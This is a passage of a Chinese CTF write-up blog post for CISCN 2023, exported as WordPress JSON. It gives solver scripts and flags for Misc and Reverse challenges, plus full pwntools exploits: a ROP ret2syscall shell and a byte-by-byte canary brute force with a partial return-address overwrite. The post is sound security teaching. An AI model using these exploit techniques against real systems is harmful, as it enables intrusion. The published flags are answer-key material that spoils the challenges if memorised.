import os\nfrom PIL import Image\n\n# 7200, 4000\ndic = {i: [] for i in range(4000 \/\/ 100)}\n\n\"\"\" \nQ\uff1a\u5982\u4f55\u8ba1\u7b97\u586b\u8865\u5462\uff1f\n\n\u8fd9\u4e2a\u6bd4\u8f83\u7b80\u5355\uff0c\u6bd4\u5982\u8bf4\u56fe\u7247\u4f4d\u6df1\u5ea6\u4e3a24\uff0c\u90a3\u5c31\u662f3\u4e2a\u901a\u9053\uff0c\u4e5f\u5c31\u662fRGB\u7684\u8272\u5f69\u7a7a\u95f4\uff08\u540c\u7b49\u4e0e\u4e00\u4e2a\u50cf\u7d20\u5360\u75283\u5b57\u8282\uff09\u3002\n\u6bd4\u5982\u8bf4\u73b0\u5728\u6709\u4e00\u5f20\u56fe\u7247\uff0c\u5bbd\u5ea6\u4e3a3\uff0c\u9ad8\u5ea6\u4e3a2\uff0cRGB\u8272\u5f69\u7a7a\u95f4\uff1b3 * 3 = 9 (byte)\uff0c9 % 4 = 1\uff0c\u5dee3\u4e2a\u5b57\u8282\u624d\u80fd4\u5b57\u8282\u8865\u9f50\u3002\n\u6bcf\u884c\u5c31\u4f1a\u586b\u88653\u4e2a\u5b57\u8282\uff0c\u9ad8\u5ea6\u4e3a2\uff0c\u90a3\u5c31\u4e00\u51712\u884c\uff0c\u4f1a\u586b\u88656\u5b57\u8282\u3002\n\"\"\"\n\nfor root, dirs, files in os.walk(\".\/tmp4\"):\n    for file in files:\n        imgPath = os.path.join(root, file)\n        img = Image.open(imgPath)\n        \n        with open(imgPath, \"rb\") as f:\n            data = f.read()\n        x = int.from_bytes(data[6:8], byteorder=\"little\", signed=False)\n        y = int.from_bytes(data[8:10], byteorder=\"little\", signed=False)\n        width = abs(int.from_bytes(data[0x12:0x12+4], byteorder=\"little\", signed=True))\n        height = abs(int.from_bytes(data[0x16:0x16+4], byteorder=\"little\", signed=True))\n\n        pixelData = data[54:]\n        if (size := width * 3 % 4) != 0:\n            paddingSize = 4 - size\n            # print(paddingSize, imgPath)\n            \n            paddingData = b\"\"\n            for i in range(width * 3, len(pixelData), width * 3 + paddingSize):\n                if imgPath.endswith(\"40416989777.bmp\"):\n                    print(paddingSize)\n                    print(pixelData[i:i+paddingSize])\n                    exit()\n                paddingData += pixelData[i:i+paddingSize]\n\n            dic[y\/\/100].append([x, paddingData, imgPath])\n\nallPaddingData = b\"\"\nfor key, values in dic.items():\n    values = sorted(values, key=lambda x: x[0])\n    for value in values:\n        allPaddingData += value[1]\n        \nwith open(\"part3.jpg\", \"wb\") as f:\n    f.write(allPaddingData)\n<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5177\u4f53\u7684\u5206\u6790\u8fd8\u662f\u53bbB\u795e\u7684\u535a\u5ba2\u4e0a\u770b\u5427\uff1aCISCN2023-Misc-Puzzle<\/a><\/p>\n\n\n\n
Reverse<\/h1>\n\n\n\n
Ezbytes<\/h2>\n\n\n\n
\u53c2\u89c1\uff1ahttps:\/\/richar.top\/nothingchu-ti-si-lu-ji-wp\/<\/p>\n\n\n\n
    \n
  1. \u8981\u4f7f\u5f97\u8f93\u51fa yes , \u9700\u8981 r12 == r13 -> r12 == 0 \u6210\u7acb<\/li>\n<\/ol>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
      \n
    1. r12 \u7531 catch \u8bed\u5757\u51b3\u5b9a\uff0c\u4e5f\u5c31\u662f DWARF \u3002<\/li>\n\n\n\n
    2. \u53c2\u7167\u6587\u7ae0\uff0c\u7528\u811a\u672c\u89e3\u91ca\u6307\u4ee4\uff0c\u8fd9\u91cc\u6ce8\u610f\u8981\u4fee\u590d\u4e00\u4e0b\u539f\u6765\u7684\u811a\u672c\uff0c\u539f\u672c\u5c11\u4e86\u4e00\u4e2a\u6307\u4ee4\u3002<\/li>\n<\/ol>\n\n\n\n
      gimli::Operation::RegisterOffset { register, offset,..} => {\n    let new_val = val_generator.next();\n    writeln!(w, \"    uint64_t {}=({}+{}ull);\", new_val, gimli::X86_64::register_name(register).unwrap_or(\"{error}\"), offset)?;\n    stack.push(new_val);\n}<\/code><\/pre>\n\n\n\n
        \n
      1. \u83b7\u5f97\u89e3\u91ca\u7684\u4ee3\u7801<\/li>\n<\/ol>\n\n\n\n
        #include <stdint.h>\nuint64_t cal_r12(uint64_t r12, uint64_t r13, uint64_t r14, uint64_t r15){\n    uint64_t rax=0,rbx=0;\n...\n    uint64_t v5=v1^v4;\n    uint64_t v6=v0^v5;\n...\n    uint64_t v30=v6+v29;\n    return v30;\n}<\/code><\/pre>\n\n\n\n
          \n
        1. \u4f18\u5316\u7f16\u8bd1\uff0c\u53cd\u6c47\u7f16\u5f97\u5230\u51fd\u6570\uff1a<\/li>\n<\/ol>\n\n\n\n
          __int64 __fastcall cal_r12(__int64 a1, __int64 a2, __int64 a3, __int64 a4)\n{\n  return ((a3 + 1512312) ^ 0x2D393663614447B1i64)\n       + ((a1 + 1892739) ^ 0x35626665394D17E8i64)\n       + ((a2 + 8971237) ^ 0x65342D6530C04912i64)\n       + ((a4 + 9123704) ^ 0x6336396431BE9AD9i64);\n}<\/code><\/pre>\n\n\n\n
          \u90a3\u4e48\u8981\u4f7f\u5f97 r12 = 0\uff1b\u4e5f\u5c31\u662f\u8fd9\u4e09\u4e2a\u7684\u548c\u4e3a0\uff0c-> \u6bcf\u4e00\u7ec4\u89e3\u90fd\u4e3a 0 \uff0c\u9006\u8fd0\u7b97\u5f97\u5230\u7b54\u6848\u3002\u63a5\u7740\u6ce8\u610f\u5904\u7406\u7aef\u5e8f\uff0c\u5e76\u4e14\u589e\u52a0\u4e86\u56db\u4f4d\u6570\u5b57\u3002<\/p>\n\n\n\n
          \"\"<\/div><\/figure>\n\n\n\n
          \u5f97\u5230\u811a\u672c<\/p>\n\n\n\n
          import struct\n\nvalue = [\n    0x35626665394D17E8 - 1892739,\n    0x65342D6530C04912 - 8971237,\n    0x2D393663614447B1 - 1512312,\n    0x6336396431BE9AD9 - 9123704,\n]\nprint('flag{', end='')\nfor i in value:\n    print(struct.pack('<Q', i).decode(), end='')\nprint('3861}', end='')\n# flag{e609efb5-e70e-4e94-ac69-ac31d96c3861}<\/code><\/pre>\n\n\n\n
          moveAside<\/h2>\n\n\n\n
          movObf \u6df7\u6dc6\uff0c\u5728 Strcmp \u4e0b\u65ad\u70b9\uff0cdump\u8868\u76f4\u63a5\u89e3\u3002<\/p>\n\n\n\n
          \u65ad\u5728 strcmp \uff0c\u4e24\u4e2a\u53c2\u6570\u5206\u522b\u662f\uff1a<\/p>\n\n\n\n
          0860014C  00000067\n08600154  00000092<\/code><\/pre>\n\n\n\n
          \"\"<\/div><\/figure>\n\n\n\n
          0x67 -> \u5bf9\u5e94 Table<\/p>\n\n\n\n
          \"\"<\/div><\/figure>\n\n\n\n
          0x92 \u7531\u8f93\u5165\u51b3\u5b9a\u3002<\/p>\n\n\n\n
          IDAPython \u6301\u7eed\u4fee\u6539\u4e14\u8fd0\u884c:<\/p>\n\n\n\n
          def patch_and_run(arg154, arg14c, data: list):\n    table_i = get_wide_byte(arg14c)\n    data.append(get_wide_byte(arg154))\n    patch_byte(arg154, table_i)\n    print(data)\n\ndata = []\npatch_and_run(0x8600154, 0x860014C, data)<\/code><\/pre>\n\n\n\n
          \u83b7\u5f97\u8868,\u5f97\u5230<\/p>\n\n\n\n
          data = [103,157,96,102,138,86,73,80,101,101,96,85,100,92,101,72,80,81,92,85,103,81,87,92,73,103,84,99,92,84,98,82,86,84,84,80,73,83,82,82,86,140,\n]\n\ntable = {\"1\": 0x50,\"2\": 0x53,\"3\": 0x52,\"4\": 0x55,\"5\": 0x54,\"6\": 0x57,\"7\": 0x56,\"8\": 0x49,\"9\": 0x48,\"0\": 0x51,\"a\": 0x60,\"b\": 0x63,\"c\": 0x62,\"d\": 0x65,\"e\": 0x64,\"f\": 0x67,\"g\": 0x66,\"h\": 0x99,\"i\": 0x98,\"j\": 0x9B,\"k\": 0x9A,\"l\": 0x9D,\"m\": 0x9C,\"n\": 0x9F,\"o\": 0x9E,\"p\": 0x91,\"q\": 0x90,\"r\": 0x93,\"s\": 0x92,\"t\": 0x95,\"u\": 0x94,\"v\": 0x97,\"w\": 0x96,\"x\": 0x89,\"y\": 0x88,\"z\": 0x8B,\n}\ntable2 = {}\nfor i, j in table.items():\n    table2[j] = i\nfor i in range(len(data)):\n    if data[i] in table2:\n        print(table2[data[i]],end='')\n    else:\n        print(\"*\",end='')<\/code><\/pre>\n\n\n\n
          flag*781dda4e*d910*4f06*8f5b*5c3755182337*<\/p>\n\n\n\n
          -> \u5f97\u5230flag<\/p>\n\n\n\n
          \"\"<\/div><\/figure>\n\n\n\n
          BabyRe<\/h2>\n\n\n\n
          \u513f\u7ae5\u7f16\u7a0b\uff0c\u627e\u5230\u4e3b\u8981\u903b\u8f91\u3002<\/p>\n\n\n\n
          \"\"<\/div><\/figure>\n\n\n\n
          \u6bd4\u8f83\u957f\u5ea6\uff0c\u627e secret<\/p>\n\n\n\n
          <block s=\"reportVariadicEquals\">\n    <list>\n        <block s=\"reportListAttribute\">\n            <l>\n                <option>length<\/option>\n            <\/l>\n            <block var=\"test\" \/>\n        <\/block>\n        <block s=\"reportListAttribute\">\n            <l>\n                <option>length<\/option>\n            <\/l>\n            <block var=\"secret\" \/>\n        <\/block>\n    <\/list>\n<\/block><\/code><\/pre>\n\n\n\n
          \u5982\u4e0b\uff1a<\/p>\n\n\n\n
          <block s=\"doInsertInList\">\n    <l>85<\/l>\n    <l>\n        <option>last<\/option>\n    <\/l>\n    <block var=\"secret\" \/>\n<\/block>\n<block s=\"doInsertInList\">\n    <l>6<\/l>\n    <l>1<\/l>\n    <block var=\"secret\" \/>\n<\/block>\n...<\/code><\/pre>\n\n\n\n
          \u624b\u52a8\u8fc7\u6ee4\uff1a<\/p>\n\n\n\n
          <l>92<\/l>\n<l>1<\/l>\n<l>92<\/l>\n<option>last<\/option>\n<l>8<\/l>\n<option>last<\/option>\n<l>28<\/l>\n<option>last<\/option>\n<l>20<\/l>\n<l>1<\/l>\n<l>25<\/l>\n<option>last<\/option>\n....<\/code><\/pre>\n\n\n\n
          import re\ndata = []\nwith open('flag.xml') as f:\n    data = f.readlines()\n    \nvalues = []\nfor i in range(0,len(data),2):\n    match0 = re.search(r'\\d+|last', data[i]).group()\n    match1 = re.search(r'\\d+|last', data[i+1]).group()\n    values.append((match0,match1))\nf = []\nfor value,pos in values:\n    if pos =='last':\n        f.append(int(value))\n    else:\n        position = int(pos) - 1\n        f.insert(position,int(value))\nresult = ''\nfor i in range(len(f) - 1):\n    f[i + 1] ^= f[i]\n    result += chr(f[i])\nprint(result, end='')\nprint(\"}\")<\/code><\/pre>\n\n\n\n
          \"\"<\/div><\/figure>\n\n\n\n
          Pwn<\/h1>\n\n\n\n
          \u70e7\u70e4\u644a\u513f<\/h2>\n\n\n\n
          Pijiu \u51fd\u6570\uff0c\u5564\u9152\u6570\u91cf v9 \u662f int\u578b\uff0c\u53ef\u4e3a\u8d1f<\/strong>\uff0c\u4e14\u4e3a\u8d1f\u65f6\u4e5f\u6ee1\u8db310 * v9 >= money<\/code>\u6761\u4ef6\uff0c\u5728money += -10 * v9<\/code>\u65f6\u51cf\u53bb\u8d1f\u6570\u5c31\u53ef\u5c06 money \u65e0\u9650\u5927<\/p>\n\n\n\n
          \"\"<\/div><\/figure>\n\n\n\n
          \u6709\u5f88\u591a money \u5c31\u53ef\u4ee5\u5305\u644a\u4f4d\uff0c\u8fdb\u5165 vip\u51fd\u6570\uff0cown \u53d8\u4e3a 1<\/p>\n\n\n\n
          \"\"<\/div><\/figure>\n\n\n\n
          Own \u4e3a 1\uff0c\u83dc\u5355\u5c31\u4f1a\u591a\u51fa\u9009\u98795\uff0c\u6539\u540d<\/p>\n\n\n\n
          \"\"<\/div><\/figure>\n\n\n\n
          \u9009\u62e9\u6539\u540d\uff0c\u8fdb\u5165 gaming\u51fd\u6570\uff0cscanf \u5411\u6808\u4e0a\u63a5\u6536\u6570\u636e\u4e14\u957f\u5ea6\u4e0d\u9650\uff0c\u6808\u6ea2\u51fa\u8986\u76d6\u8fd4\u56de\u5730\u5740\uff0c\u6784\u9020 ROP\u94fe\uff0c\u4f7f\u7528 ret2syscall \u8c03\u7528 excv\u51fd\u6570 \u62ff shell<\/p>\n\n\n\n
          \"\"<\/div><\/figure>\n\n\n\n
          EXP<\/strong><\/p>\n\n\n\n
          from pwn import *\n# context.arch = arch\n\n# p = process('.\/shaokao')\np = remote('39.107.137.13',37284)\n\np.sendline('1')\n# pause()\np.sendline('3')\np.sendline('-500000')\n# pause()\np.sendline('3')\n# pause()\np.sendline('4')\n\np.sendline('5')\n# gdb.attach(p)\n\n#ret_name = 0x4E60F0 + 0x8*6\n#ret_jmp_rax = 0x401b8f\npop_rdi = 0x40264f\npop_rax = 0x458827\npop_rsi = 0x40a67e\npop_rdx_rbx = 0x4a404b\nbinsh = 0x4E60F0\nsyscall = 0x458B39\n#jmp_rsp = 0x40789d\n#pop_rsp = 0x402aae\n#pop_rax_rdx_rbx = 0x4a404a\n#rsp = 0x4E60F0 + 0x8*8\n#ret = 0x458B54\n\n#p64(pop_rsp) + p64(rsp) + p64(jmp_rsp)*2 \npayload = '\/bin\/sh\\x00' + 'AAAAAAAA' + 'A'*24 + p64(pop_rax) + p64(59) + p64(pop_rdi) + p64(binsh) + p64(pop_rsi) + p64(0) + p64(pop_rdx_rbx) + p64(0)*2 + p64(syscall)\np.sendline(payload)\np.interactive()<\/code><\/pre>\n\n\n\n
          funcanary<\/strong><\/h2>\n\n\n\n
          \u6709\u4e2a\u540e\u95e8\u51fd\u6570<\/p>\n\n\n\n
          \"\"<\/div><\/figure>\n\n\n\n
          main\u51fd\u6570\u4e2d\u5faa\u73af fork \u4e0d\u65ad\u5f00\u5b50\u8fdb\u7a0b\uff0c\u5b50\u8fdb\u7a0b\u4f1a\u590d\u523b\u7236\u8fdb\u7a0b\u7684\u4fe1\u606f\uff0c\u6240\u4ee5\u5f00\u7684\u6bcf\u4e00\u4e2a\u5b50\u8fdb\u7a0b\u4e2d\u7684 canary \u4e0e\u7236\u8fdb\u7a0b\u4e2d\u7684\u90fd\u76f8\u540c<\/p>\n\n\n\n
          \"\"<\/div><\/figure>\n\n\n\n
          128A\u51fd\u6570\u91cc\uff0c\u6709 read \u6808\u6ea2\u51fa 0x18 \u4e2a\u5b57\u8282\uff0c\u53ef\u8986\u76d6\u5230\u8fd4\u56de\u5730\u5740<\/p>\n\n\n\n
          \"\"<\/div><\/figure>\n\n\n\n
          \u7efc\u4e0a\uff0c\u53ef\u901a\u8fc7\u5faa\u73af\u4e00\u4e2a\u4e00\u4e2a\u5b57\u8282\u7206\u7834 canary\uff0c\u5f53\u7206\u7834\u9519\u8bef\u5b57\u8282\u65f6\u4f1a\u8fd4\u56de smashing \u62a5\u9519\uff0c\u82e5\u7206\u7834\u51fa\u6b63\u786e\u5b57\u8282\uff0c\u7a0b\u5e8f\u6b63\u5e38\u8fd4\u56de have fun\uff0c\u6b64\u65f6 break \u7ed3\u675f\u5f53\u524d\u5b57\u8282\u7684\u7206\u7834\uff0c\u8fdb\u5165\u4e0b\u4e00\u4e2a canary\u5b57\u8282 \u7206\u7834<\/p>\n\n\n\n
          canary = '\\x00'\nfor k in range(7):\n    for i in range(256):\n        print \"the \" + str(k) + \": \" + chr(i)\n        p.send('a'*104 + canary + chr(i))\n        a = p.recvuntil(\"welcome\\n\")\n        # print 'recv:'+str(a)\n        if 'have fun' in a:\n            canary += chr(i)\n            print \"canary: \" + canary\n            break<\/code><\/pre>\n\n\n\n
          \u7206\u7834\u51fa canary \u540e\u9700\u8986\u76d6\u8fd4\u56de\u5730\u5740\uff0c\u56e0\u4e3a\u4ee3\u7801\u5730\u5740\u540e3\u4e3a\u56fa\u5b9a\u4e0d\u53d8\uff0c\u524d\u9762\u7684\u5b57\u8282\u51e0\u4e4e\u90fd\u76f8\u540c\uff0c\u6240\u4ee5\u53ea\u9700\u4fee\u6539\u6700\u540e\u4e24\u4e2a\u5b57\u8282\u5373\u53ef<\/p>\n\n\n\n
          \u540e\u95e8\u5730\u5740\u540e3\u4f4d\u662f 228\uff0c\u5012\u6570\u7b2c\u56db\u4f4d\u672a\u77e5\uff0c\u6240\u4ee5\u8fd8\u9700\u7206\u7834\u5730\u5740\u7684\u5012\u6570\u7b2c 2 \u4e2a\u5b57\u8282\uff0c\u5012\u6570\u7b2c 2 \u4e2a\u5b57\u8282\u5c31\u5728 0x02~0xf2<\/code> \u7684\u8303\u56f4\u4e2d\uff0c\u5c31\u5728\u6b64\u8303\u56f4\u4e2d\u4f9d\u6b21\u7206\u7834\uff0c\u53ea\u8981 cat \u5230 flag \u5c31\u7b97\u6210\u529f\u4e86<\/p>\n\n\n\n
          li = ['\\x02','\\x12','\\x22','\\x32','\\x42','\\x52','\\x62','\\x72','\\x82','\\x92','\\xa2','\\xb2','\\xc2','\\xd2','\\xe2','\\xf2']\nfor i in range(len(li)):\n    addr = '\\x28' + li[i]\n    payload = 'a'*104 + canary + 'A'*8 + addr\n    p.send(payload)\n    b = p.recvuntil(\"welcome\\n\")\n    print b<\/code><\/pre>\n\n\n\n
          EXP<\/strong><\/p>\n\n\n\n
          from pwn import *\n\n# p = process('.\/funcanary')\np = remote('47.93.249.245',27693)\n\np.recvuntil('welcome\\n')\ncanary = '\\x00'\nfor k in range(7):\n    for i in range(256):\n        print \"the \" + str(k) + \": \" + chr(i)\n        p.send('a'*104 + canary + chr(i))\n        a = p.recvuntil(\"welcome\\n\")\n        # print 'recv:'+str(a)\n        if 'have fun' in a:\n            canary += chr(i)\n            print \"canary: \" + canary\n            break\n\nprint(canary)\n# gdb.attach(p)\n\nli = ['\\x02','\\x12','\\x22','\\x32','\\x42','\\x52','\\x62','\\x72','\\x82','\\x92','\\xa2','\\xb2','\\xc2','\\xd2','\\xe2','\\xf2']\n# pause()\n# p.recvuntil('welcome\\n')\nfor i in range(len(li)):\n    addr = '\\x28' + li[i]\n    payload = 'a'*104 + canary + 'A'*8 + addr\n    p.send(payload)\n    b = p.recvuntil(\"welcome\\n\")\n    print b\n    # pause()\n\np.interactive()<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
          \u7b2c\u4e00\u5929\u5168\u56fd\u5341\u56db\u540d\uff0c\u529b\u538b\u4e09\u53f6\u8349\u62ff\u4e86\u897f\u5357\u7b2c\u4e00\uff0c\u7b2c\u4e8c\u5929\u5c31\u88ab\u9152\u5427\u821e\u7237\u7237\u548c\u4e09\u53f6\u8349\u7237\u7237\u5e72\u7206\u4e86\uff0c\u6700\u540e\u897f\u5357\u7b2c\u516d\uff0c\u91cd\u5e86\u7b2c\u4e00\uff0c\u8fd8\u884c […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-1852","post","type-post","status-publish","format-standard","hentry","category-wp"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/1852","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=1852"}],"version-history":[{"count":10,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/1852\/revisions"}],"predecessor-version":[{"id":1924,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/1852\/revisions\/1924"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=1852"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/categories?post=1852"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=1852"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}